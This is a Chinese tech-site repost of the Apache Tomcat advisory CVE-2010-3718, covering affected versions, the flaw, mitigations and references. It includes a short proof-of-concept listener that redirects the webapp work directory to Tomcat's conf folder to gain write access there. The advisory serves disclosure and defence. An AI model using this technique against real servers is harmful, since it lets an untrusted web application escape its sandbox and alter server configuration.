首页 / 操作系统 / Linux / Tomcat 报本地文件安全管理器漏洞

来自 Apache 网站的消息：CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions

Severity: Low

Vendor: The Apache Software Foundation

受影响的版本（oschina目前用的是7.0.6）:
- Tomcat 7.0.0 to 7.0.3
- Tomcat 6.0.0 to 6.0.？
- Tomcat 5.5.0 to 5.5.？
- Earlier, unsupported versions may also be affected

漏洞描述:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.

Example （AL2 licensed）:

Listener source
---------------
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;

public final class FooListener implements ServletContextListener {
    public void contextInitialized（ServletContextEvent event） {
        ServletContext context = event.getServletContext（）;
        java.io.File workdir = （java.io.File） context
                .getAttribute（"javax.servlet.context.tempdir"）;
        if （workdir.toString（）.indexOf（".."） < 0） {
            context.setAttribute（"javax.servlet.context.tempdir",
                    new java.io.File（workdir, "../../../../conf"））;
        }
    }
    public void contextDestroyed（ServletContextEvent event） {
    }
}

web.xml snippet
---------------
<listener>
  <listener-class>listeners.FooListener</listener-class>
</listener>


Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy all web applications from untrusted sources

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.htmlOpen Handset Alliance Android本地权限提升漏洞Apache Tomcat NIO Connector拒绝服务漏洞相关资讯      Tomcat 

Linux支持多Tomcat  （07月02日） Linux下为Tomcat安装APR  （02月14日） Apache Tomcat 9.0.0.M3 发布下载  （02月09日）

虚拟机如何访问Tomcat  （06月22日） Apache Tomcat 8.0.32 发布下载  （02月11日） Tomcat 8.0.30 发布下载  （12/07/2015 22:54:45）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图